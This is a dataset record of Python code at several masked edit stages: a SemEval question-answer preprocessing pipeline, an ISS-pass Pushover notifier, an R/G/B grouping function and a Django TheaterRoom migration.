dtype=np.int32)\n context_char_idxs = np.zeros([ans_limit, char_limit], dtype=np.int32)\n ques_idxs = np.zeros([ques_limit], dtype=np.int32)\n ques_char_idxs = np.zeros([ques_limit, char_limit], dtype=np.int32)\n y = 0\n\n def _get_word(word):\n for each in (word, word.lower(), word.capitalize(), word.upper()):\n if each in word2idx_dict:\n return word2idx_dict[each]\n return 1\n\n def _get_char(char):\n if char in char2idx_dict:\n return char2idx_dict[char]\n return 1\n for i, token in enumerate(example['ans_tokens'][:ans_limit]):\n context_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ques_tokens'][:ques_limit]):\n ques_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ans_chars'][:ans_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n context_char_idxs[i, j] = _get_char(char)\n for i, token in enumerate(example['ques_chars'][:ques_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n ques_char_idxs[i, j] = _get_char(char)\n label = example['y']\n y = float(label)\n record = tf.train.Example(features=tf.train.Features(feature={\n 'ans_idxs': tf.train.Feature(bytes_list=tf.train.BytesList(\n value=[context_idxs.tostring()])), 'ques_idxs': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[ques_idxs.tostring\n ()])), 'ans_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[context_char_idxs.tostring()])),\n 'ques_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[ques_char_idxs.tostring()])), 'y': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[np.array([y]).\n tostring()])), 'id': tf.train.Feature(int64_list=tf.train.\n Int64List(value=[example['id']]))}))\n writer.write(record.SerializeToString())\n print('Build {} / {} instances of features in total'.format(total, total_))\n meta['total'] = total\n writer.close()\n return meta\n\n\ndef save(filename, obj, message=None):\n if message is not None:\n print('Saving {}...'.format(message))\n with open(filename, 'w') as fh:\n json.dump(obj, fh)\n\n\ndef preproSemEval(config):\n word_counter, char_counter = Counter(), Counter()\n train_examples = process_file(config.SemEval_train_file, 'train',\n word_counter, char_counter, shuffle=True)\n dev_examples = process_file(config.SemEval_dev_file, 'dev',\n word_counter, char_counter)\n test_examples = process_file(config.SemEval_test_file, 'test',\n word_counter, char_counter)\n word_emb_file = (config.fasttext_file if config.fasttext else config.\n glove_word_file)\n char_emb_file = config.glove_char_file if config.pretrained_char else None\n char_emb_size = config.glove_char_size if config.pretrained_char else None\n char_emb_dim = (config.glove_dim if config.pretrained_char else config.\n char_dim)\n word2idx_dict = None\n if os.path.isfile(config.word2idx_file):\n with open(config.word2idx_file, 'r') as fh:\n word2idx_dict = json.load(fh)\n word_emb_mat, word2idx_dict = get_embedding(word_counter, 'word',\n emb_file=word_emb_file, size=config.glove_word_size, vec_size=\n config.glove_dim, token2idx_dict=word2idx_dict)\n char2idx_dict = None\n if os.path.isfile(config.char2idx_file):\n with open(config.char2idx_file, 'r') as fh:\n char2idx_dict = json.load(fh)\n char_emb_mat, char2idx_dict = get_embedding(char_counter, 'char',\n emb_file=char_emb_file, size=char_emb_size, vec_size=char_emb_dim,\n token2idx_dict=char2idx_dict)\n build_features_SemEval(config, train_examples, 'train', config.\n train_record_file, word2idx_dict, char2idx_dict)\n dev_meta = build_features_SemEval(config, dev_examples, 'dev', config.\n dev_record_file, word2idx_dict, char2idx_dict)\n test_meta = build_features_SemEval(config, test_examples, 'test',\n config.test_record_file, word2idx_dict, char2idx_dict, is_test=True)\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.dev_meta, dev_meta, message='dev meta')\n save(config.word2idx_file, word2idx_dict, message='word2idx')\n save(config.char2idx_file, char2idx_dict, message='char2idx')\n save(config.test_meta, test_meta, message='test meta')\n save('data/test.json', dev_examples, message='test example')\n",
"step-4": "<mask token>\nnlp = spacy.blank('en')\n\n\ndef word_tokenize(sent):\n doc = nlp(sent)\n return [token.text for token in doc]\n\n\ndef convert_idx(text, tokens):\n current = 0\n spans = []\n for token in tokens:\n current = text.find(token, current)\n if current < 0:\n print('Token {} cannot be found'.format(token))\n raise Exception()\n spans.append((current, current + len(token)))\n current += len(token)\n return spans\n\n\ndef process_file(filename, data_type, word_counter, char_counter, shuffle=False\n ):\n print('Generating {} examples...'.format(data_type))\n examples = []\n eval_examples = {}\n total = 0\n with open(filename, 'r') as fh:\n for l in fh:\n ques, ans, label = l.strip().split('\\t')\n ques_tokens = word_tokenize(ques)\n ques_chars = [list(token) for token in ques_tokens]\n ans_tokens = word_tokenize(ans)\n ans_chars = [list(token) for token in ans_tokens]\n label = int(label)\n total += 1\n for token in ques_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n for token in ans_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n example = {'ans_tokens': ans_tokens, 'ans_chars': ans_chars,\n 'ques_tokens': ques_tokens, 'ques_chars': ques_chars, 'y':\n label, 'id': total}\n examples.append(example)\n if random:\n random.shuffle(examples)\n print('{} questions in total'.format(len(examples)))\n return examples\n\n\ndef get_embedding(counter, data_type, limit=-1, emb_file=None, size=None,\n vec_size=None, token2idx_dict=None):\n print('Generating {} embedding...'.format(data_type))\n embedding_dict = {}\n filtered_elements = [k for k, v in counter.items() if v > limit]\n if emb_file is not None:\n assert size is not None\n assert vec_size is not None\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n if word in counter and counter[word] > limit:\n embedding_dict[word] = vector\n print('{} / {} tokens have corresponding {} embedding vector'.\n format(len(embedding_dict), len(filtered_elements), data_type))\n else:\n assert vec_size is not None\n for token in filtered_elements:\n embedding_dict[token] = [np.random.normal(scale=0.01) for _ in\n range(vec_size)]\n print('{} tokens have corresponding embedding vector'.format(len(\n filtered_elements)))\n NULL = '--NULL--'\n OOV = '--OOV--'\n token2idx_dict = {token: idx for idx, token in enumerate(embedding_dict\n .keys(), 2)} if token2idx_dict is None else token2idx_dict\n token2idx_dict[NULL] = 0\n token2idx_dict[OOV] = 1\n embedding_dict[NULL] = [(0.0) for _ in range(vec_size)]\n embedding_dict[OOV] = [(0.0) for _ in range(vec_size)]\n idx2emb_dict = {idx: embedding_dict[token] for token, idx in\n token2idx_dict.items()}\n emb_mat = [idx2emb_dict[idx] for idx in range(len(idx2emb_dict))]\n return emb_mat, token2idx_dict\n\n\ndef build_features_SemEval(config, examples, data_type, out_file,\n word2idx_dict, char2idx_dict, is_test=False):\n ans_limit = config.test_para_limit if is_test else config.para_limit\n ques_limit = config.test_ques_limit if is_test else config.ques_limit\n char_limit = config.char_limit\n\n def filter_func(example, is_test=False):\n return len(example['ans_tokens']) > ans_limit or len(example[\n 'ques_tokens']) > ques_limit\n print('Processing {} examples...'.format(data_type))\n writer = tf.python_io.TFRecordWriter(out_file)\n total = 0\n total_ = 0\n meta = {}\n for example in tqdm(examples):\n total_ += 1\n total += 1\n context_idxs = np.zeros([ans_limit], dtype=np.int32)\n context_char_idxs = np.zeros([ans_limit, char_limit], dtype=np.int32)\n ques_idxs = np.zeros([ques_limit], dtype=np.int32)\n ques_char_idxs = np.zeros([ques_limit, char_limit], dtype=np.int32)\n y = 0\n\n def _get_word(word):\n for each in (word, word.lower(), word.capitalize(), word.upper()):\n if each in word2idx_dict:\n return word2idx_dict[each]\n return 1\n\n def _get_char(char):\n if char in char2idx_dict:\n return char2idx_dict[char]\n return 1\n for i, token in enumerate(example['ans_tokens'][:ans_limit]):\n context_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ques_tokens'][:ques_limit]):\n ques_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ans_chars'][:ans_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n context_char_idxs[i, j] = _get_char(char)\n for i, token in enumerate(example['ques_chars'][:ques_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n ques_char_idxs[i, j] = _get_char(char)\n label = example['y']\n y = float(label)\n record = tf.train.Example(features=tf.train.Features(feature={\n 'ans_idxs': tf.train.Feature(bytes_list=tf.train.BytesList(\n value=[context_idxs.tostring()])), 'ques_idxs': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[ques_idxs.tostring\n ()])), 'ans_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[context_char_idxs.tostring()])),\n 'ques_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[ques_char_idxs.tostring()])), 'y': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[np.array([y]).\n tostring()])), 'id': tf.train.Feature(int64_list=tf.train.\n Int64List(value=[example['id']]))}))\n writer.write(record.SerializeToString())\n print('Build {} / {} instances of features in total'.format(total, total_))\n meta['total'] = total\n writer.close()\n return meta\n\n\ndef save(filename, obj, message=None):\n if message is not None:\n print('Saving {}...'.format(message))\n with open(filename, 'w') as fh:\n json.dump(obj, fh)\n\n\ndef preproSemEval(config):\n word_counter, char_counter = Counter(), Counter()\n train_examples = process_file(config.SemEval_train_file, 'train',\n word_counter, char_counter, shuffle=True)\n dev_examples = process_file(config.SemEval_dev_file, 'dev',\n word_counter, char_counter)\n test_examples = process_file(config.SemEval_test_file, 'test',\n word_counter, char_counter)\n word_emb_file = (config.fasttext_file if config.fasttext else config.\n glove_word_file)\n char_emb_file = config.glove_char_file if config.pretrained_char else None\n char_emb_size = config.glove_char_size if config.pretrained_char else None\n char_emb_dim = (config.glove_dim if config.pretrained_char else config.\n char_dim)\n word2idx_dict = None\n if os.path.isfile(config.word2idx_file):\n with open(config.word2idx_file, 'r') as fh:\n word2idx_dict = json.load(fh)\n word_emb_mat, word2idx_dict = get_embedding(word_counter, 'word',\n emb_file=word_emb_file, size=config.glove_word_size, vec_size=\n config.glove_dim, token2idx_dict=word2idx_dict)\n char2idx_dict = None\n if os.path.isfile(config.char2idx_file):\n with open(config.char2idx_file, 'r') as fh:\n char2idx_dict = json.load(fh)\n char_emb_mat, char2idx_dict = get_embedding(char_counter, 'char',\n emb_file=char_emb_file, size=char_emb_size, vec_size=char_emb_dim,\n token2idx_dict=char2idx_dict)\n build_features_SemEval(config, train_examples, 'train', config.\n train_record_file, word2idx_dict, char2idx_dict)\n dev_meta = build_features_SemEval(config, dev_examples, 'dev', config.\n dev_record_file, word2idx_dict, char2idx_dict)\n test_meta = build_features_SemEval(config, test_examples, 'test',\n config.test_record_file, word2idx_dict, char2idx_dict, is_test=True)\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.dev_meta, dev_meta, message='dev meta')\n save(config.word2idx_file, word2idx_dict, message='word2idx')\n save(config.char2idx_file, char2idx_dict, message='char2idx')\n save(config.test_meta, test_meta, message='test meta')\n save('data/test.json', dev_examples, message='test example')\n",
"step-5": "import tensorflow as tf\nimport random\nfrom tqdm import tqdm\nimport spacy\nimport ujson as json\nfrom collections import Counter\nimport numpy as np\nimport os.path\n\nnlp = spacy.blank(\"en\")\n\n\ndef word_tokenize(sent):\n doc = nlp(sent)\n return [token.text for token in doc]\n\n\ndef convert_idx(text, tokens):\n current = 0\n spans = []\n for token in tokens:\n current = text.find(token, current)\n if current < 0:\n print(\"Token {} cannot be found\".format(token))\n raise Exception()\n spans.append((current, current + len(token)))\n current += len(token)\n return spans\n\n\ndef process_file(filename, data_type, word_counter, char_counter, shuffle=False):\n print(\"Generating {} examples...\".format(data_type))\n examples = []\n eval_examples = {}\n total = 0\n with open(filename, \"r\") as fh:\n for l in fh:\n ques, ans, label = l.strip().split(\"\\t\")\n ques_tokens = word_tokenize(ques)\n ques_chars = [list(token) for token in ques_tokens]\n ans_tokens = word_tokenize(ans)\n ans_chars = [list(token) for token in ans_tokens]\n label = int(label)\n total += 1\n for token in ques_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n for token in ans_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n example = {\"ans_tokens\": ans_tokens,\n \"ans_chars\": ans_chars, \"ques_tokens\": ques_tokens,\n \"ques_chars\": ques_chars, \"y\":label, \"id\": total}\n \n examples.append(example)\n if random:\n random.shuffle(examples)\n print(\"{} questions in total\".format(len(examples)))\n return examples\n\n\ndef get_embedding(counter, data_type, limit=-1, emb_file=None, size=None, vec_size=None, token2idx_dict=None):\n print(\"Generating {} embedding...\".format(data_type))\n embedding_dict = {}\n filtered_elements = [k for k, v in counter.items() if v > limit]\n if emb_file is not None:\n assert size is not None\n assert vec_size is not None\n with open(emb_file, \"r\", encoding=\"utf-8\") as fh:\n for line in tqdm(fh, total=size):\n array = line.split()\n word = \"\".join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n if word in counter and counter[word] > limit:\n embedding_dict[word] = vector\n print(\"{} / {} tokens have corresponding {} embedding vector\".format(\n len(embedding_dict), len(filtered_elements), data_type))\n else:\n assert vec_size is not None\n for token in filtered_elements:\n embedding_dict[token] = [np.random.normal(\n scale=0.01) for _ in range(vec_size)]\n print(\"{} tokens have corresponding embedding vector\".format(\n len(filtered_elements)))\n\n NULL = \"--NULL--\"\n OOV = \"--OOV--\"\n token2idx_dict = {token: idx for idx, token in enumerate(\n embedding_dict.keys(), 2)} if token2idx_dict is None else token2idx_dict\n token2idx_dict[NULL] = 0\n token2idx_dict[OOV] = 1\n embedding_dict[NULL] = [0. for _ in range(vec_size)]\n embedding_dict[OOV] = [0. for _ in range(vec_size)]\n idx2emb_dict = {idx: embedding_dict[token]\n for token, idx in token2idx_dict.items()}\n emb_mat = [idx2emb_dict[idx] for idx in range(len(idx2emb_dict))]\n return emb_mat, token2idx_dict\n\n\ndef build_features_SemEval(config, examples, data_type, out_file, word2idx_dict, char2idx_dict, is_test=False):\n ans_limit = config.test_para_limit if is_test else config.para_limit\n ques_limit = config.test_ques_limit if is_test else config.ques_limit\n char_limit = config.char_limit\n\n def filter_func(example, is_test=False):\n return len(example[\"ans_tokens\"]) > ans_limit or len(example[\"ques_tokens\"]) > ques_limit\n\n print(\"Processing {} examples...\".format(data_type))\n writer = tf.python_io.TFRecordWriter(out_file)\n total = 0\n total_ = 0\n meta = {}\n for example in tqdm(examples):\n total_ += 1\n\n #if filter_func(example, is_test):\n # continue\n\n total += 1\n context_idxs = np.zeros([ans_limit], dtype=np.int32)\n context_char_idxs = np.zeros([ans_limit, char_limit], dtype=np.int32)\n ques_idxs = np.zeros([ques_limit], dtype=np.int32)\n ques_char_idxs = np.zeros([ques_limit, char_limit], dtype=np.int32)\n y = 0\n \n\n def _get_word(word):\n for each in (word, word.lower(), word.capitalize(), word.upper()):\n if each in word2idx_dict:\n return word2idx_dict[each]\n return 1\n\n def _get_char(char):\n if char in char2idx_dict:\n return char2idx_dict[char]\n return 1\n\n for i, token in enumerate(example[\"ans_tokens\"][:ans_limit]):\n context_idxs[i] = _get_word(token)\n\n for i, token in enumerate(example[\"ques_tokens\"][:ques_limit]):\n ques_idxs[i] = _get_word(token)\n\n for i, token in enumerate(example[\"ans_chars\"][:ans_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n context_char_idxs[i, j] = _get_char(char)\n\n for i, token in enumerate(example[\"ques_chars\"][:ques_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n ques_char_idxs[i, j] = _get_char(char)\n\n label = example[\"y\"]\n y = float(label)\n\n record = tf.train.Example(features=tf.train.Features(feature={\n \"ans_idxs\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[context_idxs.tostring()])),\n \"ques_idxs\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ques_idxs.tostring()])),\n \"ans_char_idxs\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[context_char_idxs.tostring()])),\n \"ques_char_idxs\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ques_char_idxs.tostring()])),\n \"y\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[np.array([y]).tostring()])),\n \"id\": tf.train.Feature(int64_list=tf.train.Int64List(value=[example[\"id\"]]))\n }))\n writer.write(record.SerializeToString())\n print(\"Build {} / {} instances of features in total\".format(total, total_))\n meta[\"total\"] = total\n writer.close()\n return meta\n\n\ndef save(filename, obj, message=None):\n if message is not None:\n print(\"Saving {}...\".format(message))\n with open(filename, \"w\") as fh:\n json.dump(obj, fh)\n\n\ndef preproSemEval(config):\n word_counter, char_counter = Counter(), Counter()\n train_examples = process_file(\n config.SemEval_train_file, \"train\", word_counter, char_counter, shuffle=True)\n dev_examples = process_file(\n config.SemEval_dev_file, \"dev\", word_counter, char_counter)\n test_examples = process_file(\n config.SemEval_test_file, \"test\", word_counter, char_counter)\n\n word_emb_file = config.fasttext_file if config.fasttext else config.glove_word_file\n char_emb_file = config.glove_char_file if config.pretrained_char else None\n char_emb_size = config.glove_char_size if config.pretrained_char else None\n char_emb_dim = config.glove_dim if config.pretrained_char else config.char_dim\n\n word2idx_dict = None\n if os.path.isfile(config.word2idx_file):\n with open(config.word2idx_file, \"r\") as fh:\n word2idx_dict = json.load(fh)\n word_emb_mat, word2idx_dict = get_embedding(word_counter, \"word\", emb_file=word_emb_file,\n size=config.glove_word_size, vec_size=config.glove_dim, token2idx_dict=word2idx_dict)\n\n char2idx_dict = None\n if os.path.isfile(config.char2idx_file):\n with open(config.char2idx_file, \"r\") as fh:\n char2idx_dict = json.load(fh)\n char_emb_mat, char2idx_dict = get_embedding(\n char_counter, \"char\", emb_file=char_emb_file, size=char_emb_size, vec_size=char_emb_dim, token2idx_dict=char2idx_dict)\n\n build_features_SemEval(config, train_examples, \"train\",\n config.train_record_file, word2idx_dict, char2idx_dict)\n dev_meta = build_features_SemEval(config, dev_examples, \"dev\",\n config.dev_record_file, word2idx_dict, char2idx_dict)\n test_meta = build_features_SemEval(config, test_examples, \"test\",\n config.test_record_file, word2idx_dict, char2idx_dict, is_test=True)\n\n save(config.word_emb_file, word_emb_mat, message=\"word embedding\")\n save(config.char_emb_file, char_emb_mat, message=\"char embedding\")\n save(config.dev_meta, dev_meta, message=\"dev meta\")\n save(config.word2idx_file, word2idx_dict, message=\"word2idx\")\n save(config.char2idx_file, char2idx_dict, message=\"char2idx\")\n save(config.test_meta, test_meta, message=\"test meta\")\n save(\"data/test.json\", dev_examples, message=\"test example\") \n",
"step-ids": [
5,
6,
7,
8,
10
]
}
|
[
5,
6,
7,
8,
10
] |
<|reserved_special_token_0|>
def issCheck():
for i in column.keys():
for x in column[i]:
if i == 'Date':
issNow = x
if issNow == timeNow:
client.send_message('ISS is over London: ' + x, title='ISS'
)
else:
break
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def issCheck():
for i in column.keys():
for x in column[i]:
if i == 'Date':
issNow = x
if issNow == timeNow:
client.send_message('ISS is over London: ' + x, title='ISS'
)
else:
break
while True:
issCheck()
time.sleep(10)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
timeNow = time.strftime('%a %b %d, %I:%M %p').lstrip('0').replace(' 0', ' ')
client = Client(user_key, api_token=api_token)
def issCheck():
for i in column.keys():
for x in column[i]:
if i == 'Date':
issNow = x
if issNow == timeNow:
client.send_message('ISS is over London: ' + x, title='ISS'
)
else:
break
while True:
issCheck()
time.sleep(10)
<|reserved_special_token_1|>
import time
import datetime
from pushover import init, Client
from scraper import *
from config import *
timeNow = time.strftime('%a %b %d, %I:%M %p').lstrip('0').replace(' 0', ' ')
client = Client(user_key, api_token=api_token)
def issCheck():
for i in column.keys():
for x in column[i]:
if i == 'Date':
issNow = x
if issNow == timeNow:
client.send_message('ISS is over London: ' + x, title='ISS'
)
else:
break
while True:
issCheck()
time.sleep(10)
<|reserved_special_token_1|>
import time
import datetime
from pushover import init, Client
from scraper import *
from config import *
# Get the current time
timeNow = time.strftime("%a %b %d, %I:%M %p").lstrip("0").replace(" 0", " ")
# Initialise Pushover for notifications
client = Client(user_key, api_token=api_token)
# Loop for times of ISS passes and compare to current time
def issCheck():
for i in column.keys():
for x in column[i]:
if i == 'Date':
issNow = x
if issNow == timeNow:
client.send_message("ISS is over London: " + x, title="ISS")
else:
break
while True:
issCheck()
time.sleep(10)
|
flexible
|
{
"blob_id": "a573c6870392024ec2e84571ccb0bad3f5c4033a",
"index": 4261,
"step-1": "<mask token>\n\n\ndef issCheck():\n for i in column.keys():\n for x in column[i]:\n if i == 'Date':\n issNow = x\n if issNow == timeNow:\n client.send_message('ISS is over London: ' + x, title='ISS'\n )\n else:\n break\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef issCheck():\n for i in column.keys():\n for x in column[i]:\n if i == 'Date':\n issNow = x\n if issNow == timeNow:\n client.send_message('ISS is over London: ' + x, title='ISS'\n )\n else:\n break\n\n\nwhile True:\n issCheck()\n time.sleep(10)\n",
"step-3": "<mask token>\ntimeNow = time.strftime('%a %b %d, %I:%M %p').lstrip('0').replace(' 0', ' ')\nclient = Client(user_key, api_token=api_token)\n\n\ndef issCheck():\n for i in column.keys():\n for x in column[i]:\n if i == 'Date':\n issNow = x\n if issNow == timeNow:\n client.send_message('ISS is over London: ' + x, title='ISS'\n )\n else:\n break\n\n\nwhile True:\n issCheck()\n time.sleep(10)\n",
"step-4": "import time\nimport datetime\nfrom pushover import init, Client\nfrom scraper import *\nfrom config import *\ntimeNow = time.strftime('%a %b %d, %I:%M %p').lstrip('0').replace(' 0', ' ')\nclient = Client(user_key, api_token=api_token)\n\n\ndef issCheck():\n for i in column.keys():\n for x in column[i]:\n if i == 'Date':\n issNow = x\n if issNow == timeNow:\n client.send_message('ISS is over London: ' + x, title='ISS'\n )\n else:\n break\n\n\nwhile True:\n issCheck()\n time.sleep(10)\n",
"step-5": "import time\nimport datetime\nfrom pushover import init, Client\nfrom scraper import *\nfrom config import *\n\n# Get the current time\ntimeNow = time.strftime(\"%a %b %d, %I:%M %p\").lstrip(\"0\").replace(\" 0\", \" \")\n\n# Initialise Pushover for notifications\nclient = Client(user_key, api_token=api_token)\n\n\n# Loop for times of ISS passes and compare to current time\ndef issCheck():\n for i in column.keys():\n for x in column[i]:\n if i == 'Date':\n issNow = x\n if issNow == timeNow:\n client.send_message(\"ISS is over London: \" + x, title=\"ISS\")\n else:\n break\n\n\nwhile True:\n issCheck()\n time.sleep(10)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def group(arr):
low, mid, high = 0, 0, len(arr) - 1
while mid <= high:
print(arr)
if arr[mid] == 'R':
arr[low], arr[mid] = arr[mid], arr[low]
low += 1
mid += 1
elif arr[mid] == 'G':
mid += 1
else:
arr[high], arr[mid] = arr[mid], arr[high]
high -= 1
return arr
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def group(arr):
low, mid, high = 0, 0, len(arr) - 1
while mid <= high:
print(arr)
if arr[mid] == 'R':
arr[low], arr[mid] = arr[mid], arr[low]
low += 1
mid += 1
elif arr[mid] == 'G':
mid += 1
else:
arr[high], arr[mid] = arr[mid], arr[high]
high -= 1
return arr
<|reserved_special_token_0|>
print(group(arr))
<|reserved_special_token_1|>
def group(arr):
low, mid, high = 0, 0, len(arr) - 1
while mid <= high:
print(arr)
if arr[mid] == 'R':
arr[low], arr[mid] = arr[mid], arr[low]
low += 1
mid += 1
elif arr[mid] == 'G':
mid += 1
else:
arr[high], arr[mid] = arr[mid], arr[high]
high -= 1
return arr
*arr, = map(str, input('enter the list of R, G, B').split())
print(group(arr))
<|reserved_special_token_1|>
def group(arr):
low, mid, high = 0, 0, len(arr)-1
while mid <= high:
print(arr)
if arr[mid] == 'R' :
arr[low], arr[mid] = arr[mid], arr[low]
low += 1
mid += 1
elif arr[mid] == 'G':
mid += 1
else:
arr[high], arr[mid] = arr[mid], arr[high]
high -= 1
return arr
*arr, = map(str, input("enter the list of R, G, B").split())
print(group(arr))
|
flexible
|
{
"blob_id": "8ad47bf292e0046550cc0ef6f6bb75cf179ebd4b",
"index": 7477,
"step-1": "<mask token>\n",
"step-2": "def group(arr):\n low, mid, high = 0, 0, len(arr) - 1\n while mid <= high:\n print(arr)\n if arr[mid] == 'R':\n arr[low], arr[mid] = arr[mid], arr[low]\n low += 1\n mid += 1\n elif arr[mid] == 'G':\n mid += 1\n else:\n arr[high], arr[mid] = arr[mid], arr[high]\n high -= 1\n return arr\n\n\n<mask token>\n",
"step-3": "def group(arr):\n low, mid, high = 0, 0, len(arr) - 1\n while mid <= high:\n print(arr)\n if arr[mid] == 'R':\n arr[low], arr[mid] = arr[mid], arr[low]\n low += 1\n mid += 1\n elif arr[mid] == 'G':\n mid += 1\n else:\n arr[high], arr[mid] = arr[mid], arr[high]\n high -= 1\n return arr\n\n\n<mask token>\nprint(group(arr))\n",
"step-4": "def group(arr):\n low, mid, high = 0, 0, len(arr) - 1\n while mid <= high:\n print(arr)\n if arr[mid] == 'R':\n arr[low], arr[mid] = arr[mid], arr[low]\n low += 1\n mid += 1\n elif arr[mid] == 'G':\n mid += 1\n else:\n arr[high], arr[mid] = arr[mid], arr[high]\n high -= 1\n return arr\n\n\n*arr, = map(str, input('enter the list of R, G, B').split())\nprint(group(arr))\n",
"step-5": "def group(arr):\r\n low, mid, high = 0, 0, len(arr)-1\r\n while mid <= high:\r\n print(arr)\r\n if arr[mid] == 'R' :\r\n arr[low], arr[mid] = arr[mid], arr[low]\r\n low += 1\r\n mid += 1\r\n elif arr[mid] == 'G':\r\n mid += 1\r\n else:\r\n arr[high], arr[mid] = arr[mid], arr[high]\r\n high -= 1\r\n return arr\r\n \r\n*arr, = map(str, input(\"enter the list of R, G, B\").split())\r\n\r\nprint(group(arr))\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def reverse_func(apps, schema_editor):
""" No need to do anything since the table is dropped completely """
pass
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('name', models.CharField(max_length=20
)), ('rows_count', models.IntegerField()), ('seats_per_row_count',
models.IntegerField())]), migrations.RunPython(forwards_func,
reverse_func)]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def forwards_func(apps, schema_editor):
""" Add Theater Rooms """
TheaterRoom = apps.get_model('main', 'TheaterRoom')
db_alias = schema_editor.connection.alias
TheaterRoom.objects.using(db_alias).bulk_create([TheaterRoom(name=
'Red Room', rows_count=10, seats_per_row_count=15), TheaterRoom(
name='Blue Room', rows_count=20, seats_per_row_count=30)])
def reverse_func(apps, schema_editor):
""" No need to do anything since the table is dropped completely """
pass
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('name', models.CharField(max_length=20
)), ('rows_count', models.IntegerField()), ('seats_per_row_count',
models.IntegerField())]), migrations.RunPython(forwards_func,
reverse_func)]
<|reserved_special_token_1|>
from django.db import migrations, models
def forwards_func(apps, schema_editor):
""" Add Theater Rooms """
TheaterRoom = apps.get_model('main', 'TheaterRoom')
db_alias = schema_editor.connection.alias
TheaterRoom.objects.using(db_alias).bulk_create([TheaterRoom(name=
'Red Room', rows_count=10, seats_per_row_count=15), TheaterRoom(
name='Blue Room', rows_count=20, seats_per_row_count=30)])
def reverse_func(apps, schema_editor):
""" No need to do anything since the table is dropped completely """
pass
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('name', models.CharField(max_length=20
)), ('rows_count', models.IntegerField()), ('seats_per_row_count',
models.IntegerField())]), migrations.RunPython(forwards_func,
reverse_func)]
<|reserved_special_token_1|>
# Generated by Django 2.2.3 on 2019-07-14 13:34
from django.db import migrations, models
def forwards_func(apps, schema_editor):
""" Add Theater Rooms """
TheaterRoom = apps.get_model("main", "TheaterRoom")
db_alias = schema_editor.connection.alias
TheaterRoom.objects.using(db_alias).bulk_create([
TheaterRoom(name="Red Room", rows_count=10, seats_per_row_count=15),
TheaterRoom(name="Blue Room", rows_count=20, seats_per_row_count=30),
])
def reverse_func(apps, schema_editor):
""" No need to do anything since the table is dropped completely """
pass
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='TheaterRoom',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('rows_count', models.IntegerField()),
('seats_per_row_count', models.IntegerField()),
],
),
migrations.RunPython(forwards_func, reverse_func),
]
|
flexible
|
{
"blob_id": "a4b61a5a79e314e56ba25c6e2e735bd2ee4ef0d3",
"index": 4551,
"step-1": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=20\n )), ('rows_count', models.IntegerField()), ('seats_per_row_count',\n models.IntegerField())]), migrations.RunPython(forwards_func,\n reverse_func)]\n",
